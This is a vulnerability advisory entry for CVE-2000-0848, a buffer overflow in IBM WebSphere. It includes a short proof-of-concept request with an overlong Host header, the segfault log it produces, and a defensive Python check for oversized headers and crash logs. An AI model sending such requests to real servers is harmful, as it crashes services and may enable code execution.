IBM WebSphere web application server (WAS) buffer overflow vulnerability

Vulnerability ID: 1106002    Vulnerability type: Buffer overflow
Published: 2000-09-15    Updated: 2006-08-21
CVE ID: CVE-2000-0848    CNNVD-ID: CNNVD-200011-031
Platform: Multiple    CVSS score: 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/20229
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200011-031
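|Vulnerability details
IBM WebSphere web application server (WAS) has a buffer overflow vulnerability. A remote attacker can execute arbitrary commands via an overly long Host: request header.
|Exploit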
source: http://www.securityfocus.com/bid/1691/info

Large amounts of data (i.e. 1092+ characters) in the Host: request header may cause the web server process to fault on signal 11 (SIGSEGV) or signal 10 (SIGBUS).

GET /servletsnoop HTTP/1.0
Host: xxxxxxxxxxxxxxxxxxxxxxxx(1092+ characters)

resulted in the following IBMHTTPD log entry:

[Fri May 26 12:00:54 2000] [notice] child pid 11306 exit signal Segmentation Fault (11)
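
A defender-side check for the condition described above, as an added example that is not part of the original advisory: it flags requests whose Host: value is longer than any valid hostname and picks child-crash entries out of the error log. The 259-character limit, the function names and the sample inputs are assumptions constructed for illustration.

```python
import re

# Assumption: 253 is the longest valid DNS name; allow a ":port" suffix on top.
MAX_HOST_LEN = 253 + len(":65535")

# Matches the error-log entry format shown on this page.
CHILD_EXIT = re.compile(
    r"^\[(?P<when>[^\]]+)\] \[notice\] child pid (?P<pid>\d+) "
    r"exit signal (?P<name>.+?) \((?P<signo>\d+)\)"
)
# Signal numbers as given in the advisory (numbering is platform-dependent).
FAULT_SIGNALS = {10, 11}


def host_header_length(raw_request: bytes):
    """Return the length of the Host header value, or None if absent."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"host":
            return len(value.strip())
    return None


def is_oversized_host(raw_request: bytes, limit: int = MAX_HOST_LEN) -> bool:
    """True when a Host header is present and longer than the limit."""
    length = host_header_length(raw_request)
    return length is not None and length > limit


def crashed_children(log_lines):
    """Yield (timestamp, pid, signo) for children killed by signal 10 or 11."""
    for line in log_lines:
        m = CHILD_EXIT.match(line)
        if m and int(m["signo"]) in FAULT_SIGNALS:
            yield m["when"], int(m["pid"]), int(m["signo"])


# Constructed sample input; the first log line is the page's entry, unwrapped.
SAMPLE_LOG = [
    "[Fri May 26 12:00:54 2000] [notice] child pid 11306 exit signal Segmentation Fault (11)",
    "[Fri May 26 12:01:10 2000] [notice] child pid 11307 exit signal Terminated (15)",
]
SAMPLE_OK = b"GET /servletsnoop HTTP/1.0\r\nHost: www.example.com\r\n\r\n"
SAMPLE_LONG = b"GET /servletsnoop HTTP/1.0\r\nHost: " + b"x" * 1092 + b"\r\n\r\n"

if __name__ == "__main__":
    print(list(crashed_children(SAMPLE_LOG)))
    print(is_oversized_host(SAMPLE_OK), is_oversized_host(SAMPLE_LONG))
```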
|References

Source: BID
Name: 1691
Link: http://www.securityfocus.com/bid/1691
Source: BUGTRAQ
Name: 20000915 WebSphere application server plugin issue & vendor fix
Link: http://archives.neohapsis.com/archives/bugtraq/2000-09/0192.html
Source: www-4.ibm.com
Link: http://www-4.ibm.com/software/webservers/appserv/doc/v3022/fxpklst.htm#Security
Source: XF
Name: websphere-header-dos
Link: http://xforce.iss.net/static/5252.php